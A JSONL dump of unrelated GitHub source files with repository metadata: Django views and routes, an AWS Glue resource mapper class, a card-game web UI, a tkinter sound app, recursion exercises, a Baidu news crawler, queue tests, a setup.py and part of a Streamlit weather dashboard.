course_type,'data':data})\n\n#更新逻辑\ndef updata_title(request):\n id = request.session.get('id')\n title = request.POST.get(\"title\")\n cate_sel = request.POST.get(\"cate_sel\") # 所属课程分类\n t_id = TCategory.objects.filter(titles=cate_sel)\n publish_time = request.POST.get(\"time\")\n txt = request.POST.get(\"txt\")\n t = Title.objects.get(id=id)\n try:\n if not publish_time:\n publish_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n t.title = title\n t.content = txt\n t.publish_time = publish_time\n t.cate_id = t_id[0].id\n t.save()\n data = Title.objects.filter(cate_id=t_id[0].id)\n if len(data) < 5:\n num = 1\n else:\n if len(data) // 5 == 0:\n num = int(len(data) / 5)\n else:\n num = int(len(data) / 5) + 1\n return HttpResponse(\"添加成功!\" + str(t_id[0].id) + \"!\" + str(t_id[0].level) + \"!\" + str(num))\n except:\n traceback.print_exc()\n return HttpResponse(\"添加失败!\")\n\n#排序\ndef read_sort(request):\n id = request.GET.get('id')\n level = request.GET.get('level')\n read = request.GET.get('read')\n time = request.GET.get('time')\n list1 = []\n if level == '2':\n id = int(id)\n data = TCategory.objects.filter(id=id)\n for i in data:\n if read == 'true':\n pt = Title.objects.filter(cate__id=i.id).order_by('count')[0:5] # 查文章对象\n elif read == 'false':\n pt = Title.objects.filter(cate__id=i.id).order_by('-count')[0:5]\n elif time == 'true':\n pt = Title.objects.filter(cate__id=i.id).order_by('publish_time')[0:5] # 查文章对象\n else:\n pt = Title.objects.filter(cate__id=i.id).order_by('-publish_time')[0:5]\n for i in pt:\n list1.append(i)\n return JsonResponse({\"list1\": list1, 'data': list(data)}, json_dumps_params={\"default\": my_default})\n elif level == '1':\n id = int(id)\n data = TCategory.objects.filter(parnt_elevel=id)\n for i in data:\n if read == 'true':\n pt = Title.objects.filter(cate__id=i.id).order_by('count')[0:5] # 查文章对象\n elif read == 'false':\n pt = Title.objects.filter(cate__id=i.id).order_by('-count')[0:5]\n elif time == 'true':\n pt = Title.objects.filter(cate__id=i.id).order_by('publish_time')[0:5] # 查文章对象\n else:\n pt = Title.objects.filter(cate__id=i.id).order_by('-publish_time')[0:5]\n for i in pt:\n list1.append(i)\n return JsonResponse({\"list1\": list1, 'data': list(data)}, json_dumps_params={\"default\": my_default})\n else:\n if read == 'true':\n title = Title.objects.all().order_by('count')[0:5] # 查文章对象\n elif read == 'false':\n title = Title.objects.all().order_by('-count')[0:5]\n elif time == 'true':\n title = Title.objects.all().order_by('publish_time')[0:5] # 查文章对象\n else:\n title = Title.objects.all().order_by('-publish_time')[0:5]\n course_type = TCategory.objects.filter(level=2)\n return JsonResponse({\"title\": list(title),'course_type':list(course_type)}, json_dumps_params={\"default\": my_default})\n # return JsonResponse(list(list1),safe=False, json_dumps_params={\"default\": my_default1})\n\n\n\n\ndef home9(request):\n t_all = Title.objects.all()\n t_all2 = TCategory.objects.filter(level=2)\n paginator = Paginator(t_all,5)\n if request.method == \"GET\":\n present_all = paginator.page(1)\n return render(request,'courseapp/index.html',{'present_all':present_all})\n if request.is_ajax():\n page = request.GET.get(\"page\")\n try:\n present_all = paginator.page(page)\n except PageNotAnInteger:\n present_all = paginator.page(1)\n except InvalidPage:\n present_all = paginator.page(paginator.num_pages)\n present_list = list(present_all.object_list.values())\n result = {}\n return JsonResponse({\"t_all\": list(t_all),\"t_all2\":t_all2},json_dumps_params={\"default\": my_default})\n\n\n\n\n\n# Paginator\n# per_page: 每页显示记录数量\n# count:数据总个数\n# num_pages:总页数\n# page_range:总页数的索引范围,如: (1,10),(1,200)\n# page:page对象 page(2) 代表第二页数据的对象\n#\n#\n# Page\n# has_next:是否有下一页\n# has_previous:是否有上一页\n# next_page_number:下一页页码\n# previous_page_number:上一页页码\n# object_list:分页之后的当前页数据列表\n# number:当前页\n# paginator:paginator对象,父类对象\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"filter69/course","sub_path":"courseapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"31311634051","text":"from typing import Generator\n\nimport boto3\n\nfrom resources.aws_resource import AWSResource\n\n\nclass GlueCatalog(AWSResource):\n\n def __init__(self, glue_catalog: dict, should_dump_json: bool = False) -> None:\n self.attr_map = {\"arn\": \"GlueCatalogArn\"}\n super().__init__(\"GlueCatalog\", glue_catalog, should_dump_json)\n\n\ndef retrieve_glue_catalog() -> Generator[GlueCatalog, None, None]:\n\n region: str = boto3.session.Session().region_name\n account_id: str = boto3.client(\"sts\").get_caller_identity().get(\"Account\")\n yield GlueCatalog({\n \"GlueCatalogArn\": f\"arn:aws:glue:{region}:{account_id}:catalog\"\n })\n","repo_name":"tgihf/aws-resource-mapper","sub_path":"resources/glue_catalog.py","file_name":"glue_catalog.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5202085165","text":"\nfrom genius_invocation.web.game.game import GeniusGame\nfrom genius_invocation.web.game.action import *\nfrom genius_invocation.utils import *\nimport genius_invocation.card.action as actioncard\nfrom genius_invocation.user_layout import layout\nfrom genius_invocation.web.utils_dict import get_dict\nimport js\nfrom pyodide import create_proxy\n\nfrom genius_invocation.web.get_card import get_card\n\nimport inspect\n\n\n\nelement_to_dice = {\n \"CRYO\": \"rgb(153,255,255)\",\n \"HYDRO\": \"rgb(58,90,186)\",\n \"PYRO\": \"rgb(255,153,153)\",\n \"ELECTRO\": \"rgb(144,53,144)\",\n \"ANEMO\": \"rgb(128,255,215)\",\n \"GEO\": \"rgb(255,230,153)\",\n \"DENDRO\": \"rgb(126,194,54)\",\n \"None\": \"rgb(187, 187, 187)\",\n \"OMNI\": \"rgb(255,221,245)\",\n}\n\nasync def main():\n\n get_card()\n\n available_card = []\n ignore = [actioncard.ActionCard, actioncard.EquipmentCard, actioncard.WeaponCard, actioncard.TalentCard, actioncard.ArtifactCard, actioncard.SupportCard, actioncard.FoodCard]\n for name, obj in inspect.getmembers(actioncard):\n if inspect.isclass(obj) and obj not in ignore:\n available_card.append((name, obj.name, obj.name_ch, obj))\n\n \n \n\n # js_available_card = {available_card[i][2]: available_card[i][0] for i in range(len(available_card))}\n # js.load_action_cards(create_proxy(js_available_card))\n select = []\n card_select = []\n cur_idx = 0\n while True:\n await asyncio.sleep(0.1)\n if js.document.getElementById('currentselect').innerText != '':\n select.append(js.document.getElementById('currentselect').innerText.split(' '))\n js.document.getElementById('currentselect').innerText = ''\n current_available_card = select_card(select[cur_idx], available_card)\n js.load_action_cards(create_proxy(current_available_card))\n if js.document.getElementById('current_select_card').innerText != '':\n card_select.append(js.document.getElementById('current_select_card').innerText.split(' '))\n js.document.getElementById('current_select_card').innerText = ''\n cur_idx += 1\n if cur_idx == 2:\n\n break\n while True:\n await asyncio.sleep(0.1)\n if js.document.getElementById('gamestatus').innerText != '':\n for item in js.document.getElementsByClassName('before'):\n item.style.display = 'none'\n break\n \n print(select)\n deck1 = {\n 'character': select[0],\n 'action_card': card_select[0]\n }\n deck2 = {\n 'character': select[1],\n 'action_card': card_select[1]\n }\n game = GeniusGame(player0_deck=deck1, player1_deck=deck2)\n information = []\n\n while not game.is_end:\n message = get_dict(game)\n\n\n game_information = message['game']\n game_inf_str = f\"回合: {game_information['round']}, 阶段: {game_information['round_phase']}, 当前玩家: {game_information['active_player']}, 先手玩家: {game_information['first_player']}\"\n active_player = game_information['active_player']\n js.document.getElementById('information').innerText = game_inf_str\n for i in range(2):\n js.document.getElementsByClassName(f'player{i}box')[0].style.borderColor = '#DDDDDD'\n js.document.getElementsByClassName(f'player{active_player}box')[0].style.borderColor = '#EE6622'\n # print(game.encode_message())\n print(message)\n for i, player in enumerate(['player0', 'player1']):\n hand_zone = message[i]['hand_zone']\n for idx in range(10):\n js.document.getElementById(f'{player}_card{idx}').innerText = ''\n for idx, item in enumerate(hand_zone):\n js.document.getElementById(f'{player}_card{idx}').innerText = item\n dice_zone = message[i]['dice_zone']\n for idx in range(16):\n js.document.getElementById(f'{player}_dice{idx}').innerText = ''\n js.document.getElementById(f'{player}_dice{idx}').style.background = '#00000000'\n for idx, item in enumerate(dice_zone):\n js.document.getElementById(f'{player}_dice{idx}').innerText = ''\n js.document.getElementById(f'{player}_dice{idx}').style.background = element_to_dice[item]\n\n card_num = message[i]['card_zone']\n card_num_place = js.document.getElementsByClassName(f'cardzone {player}')[0]\n card_num_place = card_num_place.getElementsByClassName('thetitle')[1]\n card_num_place.innerText = f'{card_num}'\n\n # 召唤物区\n summon_zone = message[i]['summon_zone']\n for idx in range(4):\n summon = js.document.getElementsByClassName(f'summon{idx} {player}')[0]\n summon.getElementsByClassName('thetitle')[0].innerText = f'召唤区{idx+1}'\n summon.getElementsByClassName('inneritem')[0].innerText = ''\n for idx, item in enumerate(summon_zone):\n summon = js.document.getElementsByClassName(f'summon{idx} {player}')[0]\n summon.getElementsByClassName('thetitle')[0].innerText = item[0]\n summon.getElementsByClassName('inneritem')[0].innerText = item[1]\n\n # 支援区\n support_zone = message[i]['support_zone']\n for idx in range(4):\n support = js.document.getElementsByClassName(f'support{idx} {player}')[0]\n support.getElementsByClassName('thetitle')[0].innerText = f'支援区{idx+1}'\n support.getElementsByClassName('inneritem')[0].innerText = ''\n for idx, item in enumerate(support_zone):\n support = js.document.getElementsByClassName(f'support{idx} {player}')[0]\n support.getElementsByClassName('thetitle')[0].innerText = item[0]\n support.getElementsByClassName('inneritem')[0].innerText = item[1]\n\n # 角色区\n character_zone = message[i]['character_zone']\n characters = [js.document.getElementsByClassName(f'character{j} {player}')[0] for j in range(3)]\n for idx, item in enumerate(character_zone):\n if item['base'][4]:\n characters[idx].style.borderColor = '#994400'\n else:\n characters[idx].style.borderColor = '#00000000'\n js.document.getElementById(f'{player}_character{idx}_element').style.background = element_to_dice[item['base'][0]]\n characters[idx].getElementsByClassName('thetitle')[0].innerText = item['base'][1]\n js.document.getElementById(f'{player}_character{idx}_health').innerText = item['base'][2]\n js.document.getElementById(f'{player}_character{idx}_power').innerText = item['base'][3]\n for skill_idx, skill in enumerate(item['skills']):\n js.document.getElementById(f'{player}_character{idx}_skill{skill_idx}').innerText = skill\n weapon_card = item.get('weapon', None)\n if weapon_card is None:\n js.document.getElementById(f'{player}_character{idx}_weapon').style.background = '#DDDDDD'\n js.document.getElementById(f'{player}_character{idx}_weapon_inner').innerText = '武器\\n(空)'\n else:\n js.document.getElementById(f'{player}_character{idx}_weapon').style.background = '#888888'\n js.document.getElementById(f'{player}_character{idx}_weapon_inner').innerText = '武器\\n' + weapon_card\n\n artifact_card = item.get('artifact', None)\n if artifact_card is None:\n js.document.getElementById(f'{player}_character{idx}_artifact').style.background = '#DDDDDD'\n js.document.getElementById(f'{player}_character{idx}_artifact_inner').innerText = '圣遗物\\n(空)'\n else:\n js.document.getElementById(f'{player}_character{idx}_artifact').style.background = '#888888'\n js.document.getElementById(f'{player}_character{idx}_artifact_inner').innerText = '圣遗物\\n' + artifact_card\n \n talent = item.get('talent', None)\n if talent is None:\n js.document.getElementById(f'{player}_character{idx}_talent').style.background = '#DDDDDD'\n js.document.getElementById(f'{player}_character{idx}_talent_inner').innerText = '天赋\\n(空)'\n else:\n js.document.getElementById(f'{player}_character{idx}_talent').style.background = '#888888'\n js.document.getElementById(f'{player}_character{idx}_talent_inner').innerText = '天赋\\n' + talent\n\n\n\n if len(item['status']) == 0:\n chara_state = '角色状态\\n(空)'\n else:\n chara_state = '角色状态\\n' + '\\n'.join(item['status'])\n js.document.getElementById(f'{player}_character{idx}_state_inner').innerText = chara_state\n\n if item['active'] == \"Active\":\n js.document.getElementById(f'{player}_character{idx}_group_state').style.display = 'inline-block'\n if len(item['shield']) == 0:\n shield_state = '护盾\\n(空)'\n else:\n shield_state = '护盾\\n' + '\\n'.join(item['shield'])\n if len(item['active_status']) == 0:\n active_state = '出战状态\\n(空)'\n else:\n active_state = '出战状态\\n' + '\\n'.join(item['active_status'])\n js.document.getElementById(f'{player}_character{idx}_group_state_inner').innerText = shield_state +'\\n' + active_state\n else:\n js.document.getElementById(f'{player}_character{idx}_group_state').style.display = 'none'\n \n\n\n action = await from_input(game)\n game.step(action)\n\n print_information(information)\n\nif __name__ == '__main__':\n main()","repo_name":"flick-ai/Genius-Invokation","sub_path":"genius_invocation/web/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10048,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"} +{"seq_id":"892570725","text":"from tkinter import * \nfrom tkinter.ttk import *\nfrom pygame import mixer\n \n# Inicializo sonido y ventana\nmixer.init() \nroot = Tk()\nframe = Frame(root)\nframe.pack()\n\nbottomframe = Frame(root)\nbottomframe.pack( side = BOTTOM )\n\nsound = mixer.Sound('applause-1.wav')\n \n# Adding widgets to the root window\nLabel(frame, text = 'Test lin', font =(\n 'Verdana', 15)).pack(side = TOP, pady = 10)\n \n\nphoto = PhotoImage(file = r\"a.png\")\nphotoimage = photo.subsample(3, 3)\n\nphoto1 = PhotoImage(file = r\"i.png\")\nphotoimage1 = photo1.subsample(3, 3)\n\nphoto2 = PhotoImage(file = r\"m.png\")\nphotoimage2 = photo2.subsample(3, 3)\n\nphoto3 = PhotoImage(file = r\"u.png\")\nphotoimage3 = photo3.subsample(3, 3)\n\nphoto4 = PhotoImage(file = r\"s.png\")\nphotoimage4 = photo4.subsample(3, 3)\n\nphoto5 = PhotoImage(file = r\"sh.png\")\nphotoimage5 = photo5.subsample(3, 3)\n\n\ndef display_sound():\n\tprint(\"Avion fue presionado\")\n\tsound.play()\n\ndef display_sound1():\n\tprint(\"Raton fue presionado\")\n\tsound.play()\n\ndef display_sound2():\n\tprint(\"Helado fue presionado\")\n\tsound.play()\n# here, image option is used to\n# set image on button\n# compound option is used to align\n# image on LEFT side of button\nButton(frame, image = photoimage, compound = LEFT, command=display_sound).pack(side = LEFT)\nButton(frame, image = photoimage1, compound = RIGHT, command=display_sound1).pack(side = LEFT) \nButton(frame, image = photoimage2, compound = RIGHT, command=display_sound2).pack(side = LEFT)\nButton(frame, image = photoimage3, compound = RIGHT, command=display_sound2).pack(side = BOTTOM)\nButton(frame, image = photoimage4, compound = RIGHT, command=display_sound2).pack(side = LEFT)\nButton(frame, image = photoimage5, compound = RIGHT, command=display_sound2).pack(side = LEFT)\nmainloop()\n","repo_name":"sibarras/julieta_sound_tester","sub_path":"num_1/ejemplos gui/window1v1.2.py","file_name":"window1v1.2.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17783852702","text":"# Задача 26: Напишите программу, которая на вход принимает два числа A и B, и возводит число А в целую степень B с помощью рекурсии.\n# def power(a,b):\n# if b==1:\n# return a\n# else:\n# return a*power(a,b-1)\n \n# a = int(input('Введите число, которое хотите возвести в степень: '))\n# b = int(input('Введите степень, в которую необходимо возвести число: '))\n# if b==0:\n# print(a,' в степени ',b,' равно 1')\n# else:\n# print(a,' в степени ',b,' равно ',power(a,b))\n\n\n# Задача 28: Напишите рекурсивную функцию sum(a, b), возвращающую сумму двух целых неотрицательных чисел. Из всех арифметических операций допускаются только +1 и -1. Также нельзя использовать циклы.\ndef check(a): #Проверка введенного значения на наличие каких-либо символов, кроме требуемых.\n ab_set = {'1', '2', '3', '4', '5', '6', '7', '8', '9', '0'}\n a_set = a\n a_set = set(list(a_set)).union(ab_set)\n if a_set != ab_set:\n print('Попробуйте еще раз! Необходимо целое неотрицательное число.')\n quit()\n \ndef rec(d):\n if d==0:\n return 0\n else:\n return 1+(rec(d-1))\n\na = input('Введите первое слагаемое (целое неотрицательное число): ')\ncheck(a)\nc = int(a)\n\na = input('Введите второе слагаемое (целое неотрицательное ��исло): ')\ncheck(a)\nd = int(a)\n\nprint('Сумма ',c,' и ',d,' равна ',rec(d)+c)\n","repo_name":"Deevilynn/HWPY5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28192856177","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nroot_mod = '/home/xxguo/Project/crawler'\nsys.path.append(root_mod)\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport re\nimport time\nimport random\nfrom lxml import etree\nfrom datetime import datetime\nfrom urllib import quote, unquote\n#from bs4 import BeautifulSoup\nfrom scheduler.crawler import Crawler, export, Scheduler\nfrom models.search.model import SearchArticleModel\nfrom utils.readability import Readability\nfrom crawlerimpl.zjld.processdata import HandleUrl , HandleContent, \\\n get_urls_re, get_charset, clear_label, clear_space, new_time, \\\n local2utc, get_code, clear_a\n\n\ndef _get_url(url, code='utf-8'):\n time.sleep(random.randint(0,3))\n html_stream = get_urls_re(url, time = 6)\n cod = get_code(url)\n try:\n if cod:\n html_stream.encoding = cod.get('encoding', code)\n else:\n html_stream.encoding = get_charset(html_stream.text)\n if html_stream.status_code != 200:\n return html_stream\n except:\n pass\n return html_stream\n\nclass EventCrawler(Crawler):\n\n type = \"zjld.baidu.newstitle\"\n\n @staticmethod\n def init(conf=None):\n\n from xlutils.copy import copy\n import xlrd\n import os\n SRC_PATH = os.path.dirname(__file__)\n bk = xlrd.open_workbook(os.path.join(SRC_PATH,\n \"../../file/event.xls\"))\n sh = bk.sheet_by_name('Sheet1')\n nrows = sh.nrows\n ncols = sh.ncols\n for i in xrange(1,nrows):\n\n source_type = sh.cell_value(i,1).strip()\n if source_type == '':\n continue\n data = {\n 'source_type': source_type,\n }\n \n key = sh.cell_value(i,0).strip()\n Scheduler.schedule(EventCrawler.type ,key=str(key), \n data=data, interval=7200, reset=True)\n weibo = \"zjld.weibo.newstitle\"\n Scheduler.schedule(weibo ,key=str(key), \n data=data, interval=21600, reset=True)\n weixin = \"zjld.sogou.keywords\"\n Scheduler.schedule(weixin ,key=str(key), \n data=data, interval=7200, reset=True)\n\n def crawl(self): \n worlds = str(self.key)\n world = '+'.join(worlds.split(','))\n data = self.data\n homepage = \"http://news.baidu.com/ns?ct=0&rn=20&ie=utf-8&bs=\"+world+\"&\\\n rsv_bp=1&sr=0&cl=2&f=8&prevct=no&tn=news&word=\"+world\n # homepage = \"http://news.baidu.com/ns?ct=0&rn=20&ie=utf-8&bs=intitle:\\\n # (\"+world+\")&rsv_bp=1&sr=0&cl=2&f=8&\\\n # prevct=no&tn=newstitle&word=\"+world\n homepage = clear_space(homepage)\n html_stream = _get_url(str(homepage))\n xp_content = \"//div[@id='content_left']/ul/li\"\n items = HandleContent.get_item(html_stream,xp_content)\n xp_title = \"h3[@class='c-title']//text()\"\n xp_str = \"div//p[@class='c-author']/text()\"\n #xp_str = \"div[@class='c-title-author']/text()\"\n xp_url = \"h3[@class='c-title']/a/@href\"\n xp_count = \"div//span[@class='c-info']/a[@class='c-more_link']/text()\"\n for item in items:\n date = new_time()\n title = HandleContent.get_context(item,xp_title,text=True)\n pt_text = HandleContent.get_context(item,xp_str,text=True)\n publisher = HandleContent.get_author(pt_text, xp_text='', STR=True)\n pubtime = HandleContent.find_pubtime(pt_text)\n pubtime = local2utc(pubtime) if pubtime else date.get('utctime')\n url = HandleContent.get_context(item,xp_url,text=True)\n count = HandleContent.get_context(item,xp_count,text=True)\n try:\n count = int(count.split(u'条相同新闻',1)[0]) if count else 0\n except:\n count =0\n crawl_data = {}\n crawl_data = {\n # 'url': url,\n 'title': title,\n 'pubtime': pubtime,\n 'source': u'baidu',\n 'publisher': publisher,\n 'count': str(count),\n 'key': world,\n 'source_type': data.get('source_type', ''),\n \n }\n # print title,url\n Scheduler.schedule(ContentCrawler.type ,key=url,\n data=crawl_data)\n\nclass ContentCrawler(Crawler):\n type = \"zjld.baidu.newscontent\" \n\n def crawl(self): \n data = self.data\n url = str(self.key)\n html_stream = _get_url(url)\n soup = Readability(html_stream.text, url)\n content = soup.content\n # soup = HandleContent.get_BScontext(html_stream)\n comment = {}\n try:\n # content = soup.find_all(['p','span','h3','h4','h5']) \n # content = clear_a(content)\n text = HandleContent.get_BScontext(content, text=True).text\n comment['content'] = clear_space(text)\n except:\n content = ''\n pass\n # comment['key'] = data.get('key','')\n comment['count'] = data.get('count','')\n crawl_data = {}\n date = new_time()\n crawl_data = {\n 'title': data.get('title', ''),\n 'pubtime': data.get('pubtime', datetime.utcfromtimestamp(0)),\n 'source': 'baidu',\n 'publisher': data.get('publisher'),\n 'crtime_int': date.get('crtime_int'),\n 'crtime': date.get('crtime'),\n 'origin_source': u'百度搜索',\n 'url': url,\n 'key': data.get('key', ''),\n 'type': u'元搜索',\n 'source_type': data.get('source_type', ''),\n 'content': content,\n 'comment': comment,\n }\n if comment['content']:\n model = SearchArticleModel(crawl_data)\n export(model)\n \nif __name__ == \"__main__\":\n # key = '通用点火系统缺陷致大规模召回危机'\n # EventCrawler(key=key).crawl()\n url = 'http://china.huanqiu.com/hot/2015-03/5990111.html'\n ContentCrawler(key=url).crawl()\n # EventCrawler.init()\n","repo_name":"xxguo/crawler","sub_path":"crawlerimpl/search/baidu.py","file_name":"baidu.py","file_ext":"py","file_size_in_byte":6192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4898916793","text":"from code_challenges.stack_and_queue.queue import Queue\nimport pytest\n\ndef test_is_queue():\n q = Queue()\n assert q\n\ndef test_is_empty():\n q = Queue()\n actual = q.is_empty()\n expected = True\n assert actual == expected\n\ndef test_peek_queue():\n q = Queue()\n with pytest.raises(ValueError):\n q.peek()\n\ndef test_en_q():\n q = Queue()\n q.enq(\"Bubba Gump\")\n actual = q.peek()\n expected = \"Bubba Gump\"\n assert actual == expected\n\ndef test_de_q_empty():\n q = Queue()\n with pytest.raises(ValueError):\n q.deq()\n\ndef test_de_q_empty():\n q = Queue()\n q.enq(\"Dog\")\n actual = q.deq()\n expected = \"Dog\"\n assert actual == expected\n\ndef test_multiple_en_q():\n q = Queue()\n q.enq(\"Bubba Gump\")\n q.enq(\"Shrimp Company\")\n q.deq()\n actual = q.peek()\n expected = \"Shrimp Company\"\n assert actual == expected\n\ndef test_multiple_en_q_even_more():\n q = Queue()\n q.enq(\"Bubba Gump\")\n q.enq(\"Shrimp Company\")\n q.enq(\"Blobby\")\n q.enq(\"Trommpping\")\n q.deq()\n q.deq()\n q.deq()\n actual = q.peek()\n expected = \"Trommpping\"\n assert actual == expected\n\ndef test_multiple_dn_q():\n q = Queue()\n q.enq(\"Bubba Gump\")\n q.enq(\"Shrimp Company\")\n q.deq()\n q.deq()\n with pytest.raises(ValueError):\n q.peek()\n\ndef test_multiple_dn_q_is_empty():\n q = Queue()\n q.enq(\"Bubba Gump\")\n q.enq(\"Shrimp Company\")\n q.deq()\n q.deq()\n actual = q.is_empty()\n expected = True\n assert actual == True\n\ndef test_dequeue():\n q = Queue()\n q.enq(\"apple\")\n q.enq(\"banana\")\n actual = q.deq()\n expected = \"apple\"\n assert actual == expected\n","repo_name":"spamuelranek/data-structures-and-algorithms","sub_path":"python/tests/test_queue.py","file_name":"test_queue.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6715799431","text":"from tkinter import *\r\nimport sqlite3\r\nconn = sqlite3.connect('phone.db')\r\ncurse = conn.cursor()\r\nmain = Tk()\r\nmain.geometry(\"298x323\")\r\ndef create_table():\r\n curse.execute('CREATE TABLE IF NOT EXISTS phone(name TEXT, number REAL)')\r\ncreate_table()\r\nname_entry = Entry(main)\r\nname_entry.grid(row=1,column=5)\r\n\r\nmain.mainloop()\r\n","repo_name":"vpranav99/python-projects-","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"86458800658","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'userrequests'\n\nurlpatterns = [\n\n # requests/\n url(r'^$', views.IndexList.as_view(), name='index'),\n\n # requests/462/\n url(r'^(?P[0-9]+)/$', views.Detail.as_view(), name='detail'),\n\n # requests/searchres/\n url(r'^searchres/$', views.SearchView.as_view(), name='search'),\n\n # requests/463/discussion/\n url(r'^(?P[0-9]+)/discussion/$', views.Discussion.as_view(), name='reqdiscusion'),\n\n # requests/create/\n url(r'^create/$', views.Create.as_view(), name='create'),\n\n # requests/345/update\n url(r'^(?P[0-9]+)/update/$', views.Update.as_view(), name='update'),\n\n # login/\n url(r'^login/$', views.UserLogin.as_view(), name='login'),\n\n # register/\n url(r'^register/$', views.UserFormView.as_view(), name='register'),\n\n # logout/\n url(r'^logout/$', views.UserLogout, name='user-logout'),\n\n]\n","repo_name":"Task14/BDO","sub_path":"userrequests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43309841194","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n setup module.\n See:\n https://packaging.python.org/en/latest/distributing.html\n https://github.com/pypa/sampleproject\n\n\"\"\"\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nlong_description = ''\nif path.exists('README.md'):\n with open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='moesifdjango',\n\n # Versions should comply with PEP440. For a discussion on single-sourcing\n # the version across setup.py and the project code, see\n # https://packaging.python.org/en/latest/single_source_version.html\n version='2.3.6',\n\n description='Moesif Middleware for Python Django',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n \n # The project's main homepage.\n url='https://www.moesif.com/docs/server-integration/django/',\n\n # Author details\n author='Moesif, Inc',\n author_email='derric@moesif.com',\n\n license='Apache Software License',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 4 - Beta',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Topic :: Internet :: Log Analysis',\n 'Topic :: Software Development :: Debuggers',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Internet :: WWW/HTTP',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: Apache Software License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n\n keywords='log analysis restful api development debug',\n\n # You can just specify the packages manually here if your project is\n # simple. Or you can use find_packages().\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n\n # List run-time dependencies here. These will be installed by pip when\n # your project is installed. For an analysis of \"install_requires\" vs pip's\n # requirements files see:\n # https://packaging.python.org/en/latest/requirements.html\n install_requires=['requests', 'jsonpickle', 'python-dateutil', 'isodatetimehandler', 'moesifapi>=1.4.1',\n 'moesifpythonrequest>=0.3.0', 'apscheduler', 'nose'],\n\n # List additional groups of dependencies here (e.g. development\n # dependencies). You can install these using the following syntax,\n # for example:\n # $ pip install -e .[dev,test]\n extras_require={\n 'dev': [],\n 'test': ['nose'],\n },\n\n)\n","repo_name":"Moesif/moesifdjango","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"625617813","text":"#from os import name\nimport streamlit as st\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n# Meine Imports\nimport database_conn\nimport my_code_snippets\nimport bokeh_map_test\n\n#print(st.__version__) ## ==> 0.82.0 ist wichtig für Bokeh Link: https://github.com/streamlit/streamlit/issues/1226\ndef main():\n st.write(\"\"\"\n # WI4Future Database\n \"\"\")\n\n ## Interaktive Karte\n if st.button('Zeige Geo-Karte'):\n st.write(\"\"\"\n ## Letze Daten von Messtationen\n \"\"\")\n p = bokeh_map_test.create_map()\n st.bokeh_chart(p, use_container_width=True)\n\n ## Auswahl der Daten nach Namen\n name_list= database_conn.querry_names()\n name = st.selectbox('Select name', name_list, index=8)\n\n st.write(f\"\"\"\n ## Datensätze von {name}\n \"\"\")\n df = pd.DataFrame(database_conn.get_values(name), columns=['Time','Ort','Temperatur','Feuchte','Druck'])\n st.dataframe(df.sort_index(ascending=False))\n # DOWNLOAD\n st.markdown(my_code_snippets.get_table_download_link(df, name), unsafe_allow_html=True)\n \n st.write(f\"\"\"\n ## Chronologisches Diagramm der Wetterdaten von {name}\n \"\"\")\n new_df = df[df.Time > pd.to_datetime(\"23/5/2021\")] #Dataframe nur mit Daten seit diesem Jahr \n\n fig = make_subplots(rows=2, cols=1)\n fig.add_trace(go.Scatter(x=new_df.Time, y=new_df.Temperatur, name='Temperatur'), row=1, col=1)\n fig.add_trace(go.Scatter(x=new_df.Time, y=new_df.Feuchte, name='Feuchte'), row=1, col=1)\n fig.add_trace(go.Scatter(x=new_df.Time, y=new_df.Druck, name='Druck'), row=2, col=1)\n st.plotly_chart(fig, use_container_width=True)\n\n st.write(\"\"\"\n ## Graph mit ID als X-Achse\n Falls die Zeitdaten nicht richtig erfasst wurden kann es vorkommen, dass der obere Graph nicht angezeigt wird. 